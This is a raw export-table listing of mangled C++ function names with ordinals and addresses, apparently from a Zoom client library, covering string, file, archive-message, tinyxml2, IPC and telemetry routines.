              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44740x4293c0
              ?ReadData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44750x42f710
              ?ReadData@?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjReader@3@@Z44760x42abb0
              ?ReadFromStream@CCmmArchivePackageTree@Archive@Cmm@@QAEHPAVICmmArchiveStream@3@W4StreamType@43@@Z44770x4550e0
              ?ReadLine@CFile@Cmm@@QAEJPAXJ@Z44780x411700
              ?ReadPackageDefineFile@CCmmArchiveService@Cmm@@SAHABV?$CStringT@_W@2@@Z44790x455bc0
              ?ReadPackageDefineStream@CCmmArchiveService@Cmm@@SAHPBEIW4StreamType@ICmmArchiveStream@2@@Z44800x402d00
              ?ReferencesParent@FilePath@Cmm@@QBE_NXZ44810x45b7e0
              ?Release@CRefThread@Cmm@@QAEHXZ44820x4173f0
              ?ReleaseBuffer@?$CStringT@D@Cmm@@QAEXXZ44830x405d90
              ?ReleaseBuffer@?$CStringT@_W@Cmm@@QAEXXZ44840x403f30
              ?Remove@?$CStringT@D@Cmm@@QAEHD@Z44850x405590
              ?Remove@?$CStringT@_W@Cmm@@QAEH_W@Z44860x4036e0
              ?RemoveBlanks@?$CStringT@D@Cmm@@QAEHXZ44870x405580
              ?RemoveBlanks@?$CStringT@_W@Cmm@@QAEHXZ44880x4036d0
              ?RemoveExtension@FilePath@Cmm@@QBE?AV12@XZ44890x45afc0
              ?RemoveTimerFromList@CTimerID@Cmm@@CAXI@Z44900x4520a0
              ?Replace@?$CStringT@D@Cmm@@QAEXABV12@0@Z44910x405600
              ?Replace@?$CStringT@D@Cmm@@QAEXDD@Z44920x4056c0
              ?Replace@?$CStringT@D@Cmm@@QAEXPBD0@Z44930x405630
              ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z44940x403750
              ?Replace@?$CStringT@_W@Cmm@@QAEXPB_W0@Z44950x403780
              ?Replace@?$CStringT@_W@Cmm@@QAEX_W0@Z44960x403820
              ?ReplaceExtension@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z44970x45b260
              ?Reset@CClock@Cmm@@QAEXXZ44980x412030
              ?Reset@LogFilterItem_s@logging@@QAEXXZ44990x44ba20
              ?Reset@StrPair@tinyxml2@@QAEXXZ45000x45fa50
              ?ResetTimeZone@CTime@Cmm@@SAXXZ45010x411b90
              ?Resume@CThread@Cmm@@QAEXXZ45020x4172d0
              ?Right@?$CStringT@D@Cmm@@QBE?AV?$CRangeT@PBD@2@I@Z45030x405440
              ?Right@?$CStringT@_W@Cmm@@QBE?AV?$CRangeT@PB_W@2@I@Z45040x403590
              ?RootElement@XMLDocument@tinyxml2@@QAEPAVXMLElement@2@XZ45050x454b20
              ?RootElement@XMLDocument@tinyxml2@@QBEPBVXMLElement@2@XZ45060x454b20
              ?SaveFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PAU_iobuf@@_N@Z45070x462740
              ?SaveFile@XMLDocument@tinyxml2@@QAE?AW4XMLError@2@PBD_N@Z45080x4626d0
              ?SealElementIfJustOpened@XMLPrinter@tinyxml2@@IAEXXZ45090x463270
              ?Search@CSearchDir@Cmm@@QAEXPB_W@Z45100x4123a0
              ?Seek@CFile@Cmm@@QAE_K_JW4ESeekType@2@@Z45110x411780
              ?SeekCur@CFile@Cmm@@QAE_K_J@Z45120x411740
              ?SeekEnd@CFile@Cmm@@QAE_K_J@Z45130x411760
              ?SeekSet@CFile@Cmm@@QAE_K_J@Z45140x411720
              ?Send@Channel@ssb_ipc@@UAE_NPAVCmmMQ_Msg@Cmm@@@Z45150x45cb60
              ?SendMessageW@CIPCChannelThread@ssb_ipc@@QAEHPAVCmmMQ_Msg@Cmm@@@Z45160x4281c0
              ?Set@CAtomicInt@Cmm@@QAEJJ@Z45170x417070
              ?Set@StrPair@tinyxml2@@QAEXPAD0H@Z45180x4540e0
              ?SetAsContainer@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45190x458850
              ?SetAsEssential@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45200x458860
              ?SetAsText@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45210x454480
              ?SetAt@?$CStringT@D@Cmm@@QAEXID@Z45220x405950
              ?SetAt@?$CStringT@_W@Cmm@@QAEXI_W@Z45230x403af0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXH@Z45240x461130
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXI@Z45250x461180
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXM@Z45260x461320
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXN@Z45270x4612c0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEXPBD@Z45280x461110
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_J@Z45290x4611d0
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_K@Z45300x461220
              ?SetAttribute@XMLAttribute@tinyxml2@@QAEX_N@Z45310x461270
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD0@Z45320x4549c0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDH@Z45330x4549e0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDI@Z45340x454a00
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDM@Z45350x454ab0
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBDN@Z45360x454a80
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_J@Z45370x454a20
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_K@Z45380x454a40
              ?SetAttribute@XMLElement@tinyxml2@@QAEXPBD_N@Z45390x454a60
              ?SetBOM@XMLDocument@tinyxml2@@QAEX_N@Z45400x4544a0
              ?SetBasicMetricsInfo@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@_K@Z45410x467d90
              ?SetBool@CCmmArchiveVarivant@Cmm@@QAEXH@Z45420x459a40
              ?SetBoolSerialization@XMLUtil@tinyxml2@@SAXPBD0@Z45430x45fd60
              ?SetCData@XMLText@tinyxml2@@QAEX_N@Z45440x4544a0
              ?SetChar@CCmmArchiveVarivant@Cmm@@QAEXD@Z45450x459a60
              ?SetCountAttr@CCmmArchiveTreeNode@Archive@Cmm@@QAEXH@Z45460x458870
              ?SetCurrentDirectoryW@CFileName@Cmm@@QBEHXZ45470x412540
              ?SetDouble@CCmmArchiveVarivant@Cmm@@QAEXN@Z45480x459b20
              ?SetEof@CFile@Cmm@@QAEXXZ45490x411880
              ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ45500x4628e0
              ?SetFloat@CCmmArchiveVarivant@Cmm@@QAEXM@Z45510x459b00
              ?SetHeartbeatThreshold@CCmmPerfTelemetry@@SAXK@Z45520x456480
              ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z45530x4599d0
              ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z45540x459a10
              ?SetInternedStr@StrPair@tinyxml2@@QAEXPBD@Z45550x454120
              ?SetIsLogServiceProcess@logging@@YAX_N@Z45560x45e0a0
              ?SetItem10@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45570x41a090
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@QAEXABH@Z45580x41be80
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@QAEXABH@Z45590x419bc0
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAEXABH@Z45600x426280
              ?SetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45610x425aa0
              ?SetItem11@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45620x41a0c0
              ?SetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@QAEXABI@Z45630x419be0
              ?SetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAEXABH@Z45640x4262a0
              ?SetItem12@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45650x41a0f0
              ?SetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@QAEXAB_K@Z45660x419c10
              ?SetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@QAEXABH@Z45670x4262c0
              ?SetItem13@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45680x41a120
              ?SetItem13@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@QAEXABH@Z45690x419c40
              ?SetItem14@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45700x41a150
              ?SetItem14@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@QAEXABI@Z45710x419c70
              ?SetItem15@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45720x41a180
              ?SetItem15@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@QAEXABI@Z45730x419ca0
              ?SetItem1@?$CmmMessageTemplate_1@H@Archive@Cmm@@QAEXABH@Z45740x40c800
              ?SetItem1@?$CmmMessageTemplate_1@I@Archive@Cmm@@QAEXABI@Z45750x40c800
              ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45760x40d390
              ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45770x40d900
              ?SetItem1@?$CmmMessageTemplate_1@_J@Archive@Cmm@@QAEXAB_J@Z45780x41a8d0
              ?SetItem2@?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAEXABH@Z45790x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@HI@Archive@Cmm@@QAEXABI@Z45800x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45810x435ba0
              ?SetItem2@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45820x40d690
              ?SetItem2@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAEXAB_J@Z45830x418910
              ?SetItem2@?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAEXABH@Z45840x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@II@Archive@Cmm@@QAEXABI@Z45850x417bf0
              ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45860x435ba0
              ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45870x40d690
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEXABH@Z45880x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z45890x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45900x438eb0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45910x435630
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z45920x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z45930x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z45940x417560
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z45950x435630
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z45960x438eb0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z45970x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAEXAB_K@Z45980x40c8a0
              ?SetItem2@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@QAEXABH@Z45990x4218a0
              ?SetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46000x43f6a0
              ?SetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46010x439850
              ?SetItem3@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAEXABH@Z46020x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46030x438970
              ?SetItem3@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@QAEXABH@Z46040x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HII@Archive@Cmm@@QAEXABI@Z46050x418e60
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEXABH@Z46060x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z46070x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46080x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z46090x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z46100x419a80
              ?SetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46110x436a90
              ?SetItem3@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46120x436580
              ?SetItem3@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@QAEXABI@Z46130x418e60
              ?SetItem3@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46140x438970
              ?SetItem3@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@QAEXABH@Z46150x418e60
              ?SetItem3@?$CmmMessageTemplate_3@III@Archive@Cmm@@QAEXABI@Z46160x418e60
              ?SetItem3@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46170x43bfa0
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46180x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEXABH@Z46190x419a80
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEXABI@Z46200x419a80
              ?SetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46210x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@QAEXABH@Z46220x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46230x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAEXAB_J@Z46240x4185c0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAEXABH@Z46250x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEXABI@Z46260x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46270x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@QAEXABI@Z46280x41aef0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46290x438da0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46300x435520
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46310x43d980
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAEXABH@Z46320x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@QAEXABI@Z46330x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46340x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46350x435ab0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@QAEXABH@Z46360x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@QAEXABI@Z46370x419a80
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46380x436a90
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAEXAB_J@Z46390x4185c0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46400x41aef0
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46410x435520
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAEXAB_J@Z46420x424960
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAEXABI@Z46430x418740
              ?SetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_J_J@Archive@Cmm@@QAEXAB_J@Z46440x419350
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z46450x418740
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46460x43d980
              ?SetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46470x439760
              ?SetItem4@?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAEXABH@Z46480x419080
              ?SetItem4@?$CmmMessageTemplate_4@HHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46490x43a720
              ?SetItem4@?$CmmMessageTemplate_4@HIHI@Archive@Cmm@@QAEXABI@Z46500x419080
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEXABI@Z46510x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46520x41af10
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46530x43d550
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46540x439140
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z46550x41af10
              ?SetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46560x436980
              ?SetItem4@?$CmmMessageTemplate_4@IHIH@Archive@Cmm@@QAEXABH@Z46570x419080
              ?SetItem4@?$CmmMessageTemplate_4@IHII@Archive@Cmm@@QAEXABI@Z46580x419080
              ?SetItem4@?$CmmMessageTemplate_4@IHV?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEXAB_J@Z46590x419fb0
              ?SetItem4@?$CmmMessageTemplate_4@IIII@Archive@Cmm@@QAEXABI@Z46600x419080
              ?SetItem4@?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEXABI@Z46610x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46620x439140
              ?SetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46630x436980
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHH@Archive@Cmm@@QAEXABH@Z46640x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46650x43cca0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46660x43d550
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46670x43cca0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEXABI@Z46680x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAEXABH@Z46690x41af10
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@IV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46700x43d550
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEXABH@Z46710x418d00
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@I@Archive@Cmm@@QAEXABI@Z46720x418d00
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46730x43b630
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46740x4353f0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@_JV12@H@Archive@Cmm@@QAEXABH@Z46750x41d910
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HHH@Archive@Cmm@@QAEXABH@Z46760x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HII@Archive@Cmm@@QAEXABI@Z46770x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HIV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46780x439140
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IHI@Archive@Cmm@@QAEXABI@Z46790x419aa0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46800x436980
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAEXABI@Z46810x4185e0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEXABH@Z46820x41af10
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46830x436980
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEXABH@Z46840x418d00
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEXABI@Z46850x418d00
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46860x4353f0
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46870x43b630
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@_J@Archive@Cmm@@QAEXAB_J@Z46880x427220
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAEXABI@Z46890x418770
              ?SetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_J_JV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46900x4379c0
              ?SetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z46910x43f4e0
              ?SetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@V12@_J@Archive@Cmm@@QAEXAB_J@Z46920x4209e0
              ?SetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46930x439650
              ?SetItem5@?$CmmMessageTemplate_5@HHHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46940x421ff0
              ?SetItem5@?$CmmMessageTemplate_5@HHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z46950x41b460
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEXABI@Z46960x419ad0
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEXABH@Z46970x418d20
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEXABH@Z46980x41af30
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEXABH@Z46990x418d20
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47000x418bb0
              ?SetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAEXAB_K@Z47010x41dc00
